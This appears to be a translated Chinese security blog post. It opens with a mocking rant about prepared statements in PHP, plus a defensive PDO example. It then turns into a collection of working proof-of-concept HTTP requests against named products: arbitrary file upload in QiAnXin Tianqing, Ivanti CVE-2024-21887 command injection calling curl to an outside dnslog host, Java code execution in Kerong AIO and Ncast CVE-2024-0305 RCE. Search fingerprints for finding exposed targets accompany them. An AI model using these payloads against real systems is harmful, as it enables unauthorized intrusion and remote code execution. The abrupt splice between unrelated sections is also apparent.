Everyone has heard of prepared statements. Whenever someone asks how to defend against SQL injection, everybody answers "use prepared statements", without knowing how to actually write one. Then certain self-styled "hackers", who memorized a couple of buzzwords and now bounce around on QQ, seem to think prepared statements are invincible: as long as the SQL is handled that way, there is no vulnerability. There is something to that, but it is not absolute. When I was auditing code before, especially PHP, I found that most of the "prepared" statements with injection bugs share one idea: I do my preparing, you do your injecting. When I write the code and mandate PDO and $pdo->quote($xxx), I'm your daddy; the moment an externally controllable escaped string gets passed in, it often flips and you're my daddy. If you want to farm XP off big bro, big bro has no objection; if you question big bro's skill, big bro gets upset. Personally I think prepared statements are the easiest place to audit out an injection: just follow the variable line by line into the functions, and sooner or later some line with a query or some MB_userKey blows up. What the hell did you even "prepare"? After all that fiddling you'd be better off just opening with $id=$_GET['user_id'] and intval() and being done with it; if you're going to die, die quickly. (That one can't be injected, but normal users easily hit bugs with it, because clueless devs writing PHP can't keep track of what base the value ends up in after conversion.)
Oh right, back to QQ. I won't even go into that .phtml file, a bastard in the literal sense: a screen full of dollar signs mixed with tag attributes and shitty indentation, written like it was typed during a seizure. The principle has been analysed in plenty of articles online; I pulled out a typical piece of code, shown in the image. user_id is taken via GET, then a try-catch block catches exceptions and creates $pdo (it's just an example, ignore the root/root weak password). Then his "prepared statement": $sql="select * from dvwa.users where user_id={$id}"; normal, and the prepare is done too. The key is the later $row= line: the id variable was taken from the GET request as a user parameter, externally controllable, and the result is assigned straight to $row with no filtering. You "prepared" jack shit. A placeholder standing in for the parameter value, compile first, then pass the value: only when all three are done right can you say you are really using prepared statements to handle SQL; otherwise it's just a question of whether you die on line one or on line ten.
Then came the most classic part. The QQ wannabe hacker, stubbornly talking out of his ass, produced the super classic quote: "Injection methods are different for different databases. What you're talking about is mysql; I use mssql or sqlsever with prepared statements, what are you going to inject?"
As 倭瓜 said, searching for "hacker" on Kuaishou and QQ is like walking into 弱智吧, and I fully agree. High-EQ version: the relationship between mssql and sqlsever is like the relationship between Marika and Radagon. Low-EQ version: dumbass middle-schoolers who know nothing except reciting buzzwords. They've heard a pile of stuff like "SQL injection differs by database", "prepared statements prevent injection", "relational database", "mysql", "mssql", "sqlsever" and just recite it, to the point of producing a cosmic statement like "I use mssql or sqlsever with prepared statements". Obvious at a glance: they know the word, have no idea what it actually means, and start spouting terminology with full confidence. The scanner bros may be technically simple, but at least they can actually pwn sites and get something done. If you've never learned anything, can you please not ramble about code audits and come out with these classics? Hilarious 😅
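As an added illustration (not code from the post, the pictured .phtml file, or DVWA), here is the pattern the post criticizes next to what "placeholder, compile first, then bind the value" actually looks like with PDO. The DSN, credentials and the assumed users(user_id, first_name, last_name) columns are placeholders.

```php
<?php
// Added example, not from the original post. DSN and credentials are placeholders.
// Assumes a table dvwa.users with columns user_id (INT), first_name, last_name.

function connect(): PDO {
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=dvwa;charset=utf8mb4', 'DB_USER', 'DB_PASS');
    // Ask for real server-side prepares; with emulation on, PDO builds the query string client-side.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

// The pattern from the post: the user value is interpolated into the SQL text
// BEFORE prepare(), so prepare() compiles whatever the user turned the query into.
// A user_id of "1 OR 1=1" returns every row; the prepare() call changes nothing.
function lookupBroken(PDO $pdo, string $id): array {
    $sql = "SELECT first_name, last_name FROM dvwa.users WHERE user_id={$id}";
    $stmt = $pdo->prepare($sql);   // "prepared", but the injection already happened one line up
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The three points done right: (1) a placeholder stands in for the value,
// (2) the statement is compiled with that placeholder, (3) the value is bound
// afterwards, typed, so it can only ever be data for that one parameter.
function lookupPrepared(PDO $pdo, string $id): array {
    $sql = 'SELECT first_name, last_name FROM dvwa.users WHERE user_id = :id';
    $stmt = $pdo->prepare($sql);                         // compile first
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);  // then bind, as an integer
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The blunt alternative the post mentions (intval): validate the id as a plain
// positive integer before it reaches the database at all. Returns null on junk.
function parseUserId(?string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Usage in a request handler:
//   $id = parseUserId($_GET['user_id'] ?? null);
//   if ($id === null) { http_response_code(400); exit; }
//   $rows = lookupPrepared(connect(), (string) $id);
```

When auditing, the thing to trace is exactly what the post describes: follow the user value and check whether it is concatenated into the SQL string at any point before prepare(); if it is, the prepare() call is decorative.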
QiAnXin Tianqing (奇安信天擎) rptsvr arbitrary file upload
banner="QiAnXin web server" banner="360 web server" body="appid\":\"skylar6" body="/task/index/detail?id={ item.id }" body="已过期或者未授权,购买请联系4008-136-360"
POST /rptsvr/upload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 414
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460
Upgrade-Insecure-Requests: 1

-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/TController2.php"
Content-Type: text/x-python

<?php
phpinfo();
?>
-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="token"

skylar_report
-----------------------------55433477442814818502792421460
http://xxxx/application/api/controllers/TController.php
Ivanti Connect Secure remote command injection vulnerability (CVE-2024-21887)
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
科荣 (Kerong) AIO management system remote code execution vulnerability
body="changeAccount('8000')"
POST /UtilServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 324

operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
CVE-2024-0305 Ncast platform RCE
icon_hash="-1253433910"
POST /classes/common/busiFacade.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 98
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
JS attack surface expansion: tools that use regexes to extract URL information from JavaScript, useful for checking sensitive parameters and endpoints and for finding unauthorized-access bugs; must-haves for manual testing
https://github.com/BishopFox/jsluice
https://github.com/ttstormxx/jjjjjjjjjjjjjs
https://github.com/InitRoot/BurpJSLinkFinder
https://github.com/gh0stkey/HaE
https://github.com/RetireJS/retire.js